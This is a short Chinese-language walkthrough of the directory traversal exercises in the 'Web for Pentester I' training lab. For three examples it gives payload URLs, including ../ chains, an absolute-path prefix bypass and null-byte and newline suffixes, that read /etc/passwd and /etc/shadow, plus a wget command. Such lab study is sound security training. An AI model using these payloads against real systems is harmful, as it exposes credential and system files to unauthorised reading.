目录/文件遍历 Directory traversal
Example 1
先看原来提供的HTML的标签,猜测file是相对路径。
1
| <img src="dirtrav/example1.php?file=hacker.png" width="20">
|
测试思路
1 2 3 4
| http://192.168.56.101/dirtrav/example1.php?file=hacker.png http://192.168.56.101/dirtrav/example1.php?file=./hacker.png http://192.168.56.101/dirtrav/example1.php?file=../hacker.png http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../../../../../../etc/passwd
|
到根目录/之后,再往父目录走../,结果还是根目录/。所以多几个../也没关系。
1 2 3
| http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/passwd http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/shadow http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../../../../../../../../../../../etc/passwd
|
用wget
1
| wget -O - 'http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/passwd'
|
Example 2
先看靶场例子给的HTML。
1
| <img src="dirtrav/example2.php?file=/var/www/files/hacker.png" width="20">
|
这样看来file参数应该是一个绝对路径。
测试思路
1 2 3 4 5 6
| http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/hacker.png http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/../files/hacker.png http://192.168.56.101/dirtrav/example2.php?file=/etc/passwd http://192.168.56.101/dirtrav/example2.php?file=/boot/../etc/passwd http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd # 成功绕过
|
猜测后端是用正则表达式对参数前半部分做了限制。
Example 3
先看靶场例子给的HTML。
1
| <img src="dirtrav/example3.php?file=hacker" width="20">
|
看起来file应该是相对路径,并且后端自行拼接后缀。
测试思路
1 2 3 4 5 6
| http://192.168.56.101/dirtrav/example3.php?file=hacker http://192.168.56.101/dirtrav/example3.php?file=./hacker http://192.168.56.101/dirtrav/example3.php?file=../hacker http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd%0a http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd%00
|
参考资料
Web for pentester I part 2
http://www.atomsec.org/%E5%AE%89%E5%85%A8/web_for_pentester_i-part-2/
